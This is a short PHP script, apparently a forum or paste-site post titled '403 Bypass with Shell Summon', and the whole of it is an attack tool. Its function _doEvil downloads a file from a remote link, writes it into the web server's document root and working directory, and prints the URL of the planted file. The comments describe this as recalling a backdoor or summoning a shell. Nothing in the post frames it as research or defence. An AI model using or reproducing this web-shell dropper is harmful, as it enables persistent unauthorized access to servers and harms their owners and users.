[PHP] 403 Bypass with Shell Summon

1. <?php
2. /*
3.     403 FORBIDDEN BYPASS
4.     WITH BACKDOOR RECALL / SHELL SUMMON
5. */
6. $source = "Link";
7. $name = "filename.php";
8.  
9. function _doEvil($name, $file) {
10.     $filename = $name;
11.     $getFile = file_get_contents($file);
12.     $rootPath = $_SERVER['DOCUMENT_ROOT'].DIRECTORY_SEPARATOR;
13.     $toRootFopen = fopen("$rootPath/$filename",'w');
14.     $toRootExec = fwrite($toRootFopen, $getFile);
15.     $rootShellUrl = $_SERVER['HTTPS'] ? "https" : "http" . "://$_SERVER[HTTP_HOST]"."/$filename";
16.     $realPath = getcwd().DIRECTORY_SEPARATOR;
17.     $toRealFopen = fopen("$realPath/$filename",'w');
18.     $toRealExec = fwrite($toRealFopen, $getFile);
19.     $realShellUrl = $_SERVER['HTTPS'] ? "https" : "http" . "://$_SERVER[HTTP_HOST]".dirname($_SERVER[REQUEST_URI])."/$filename";
20.     echo "<center>";
21.     if($toRootExec) {
22.         if(file_exists($rootPath."$filename")) {
23.             echo "<h1><font color=\"#00FF00\">[OK!] <a href=\"$rootShellUrl\" target=\"_blank\">$rootShellUrl</a></font></h1>";
24.         }
25.         else {
26.             echo "<h1><font color=\"red\">$rootPath$filename<br>Doesn't exist!</font>Try with another method!</h1>";
27.         }
28.     }
29.     else {
30.         if($toRealExec) {
31.             if(file_exists($realPath."$filename")) {
32.                 echo "<h1><font color=\"#00FF00\">[OK!] <a href=\"$realShellUrl\" target=\"_blank\">$realShellUrl</a></font></h1>";
33.             }
34.             else {
35.                 echo "<h1><font color=\"red\">FAILED!</font></h1>";
36.             }
37.         }
38.     }
39.     echo "</center>";
40. }
41. _doEvil($name, $source);
42. ?>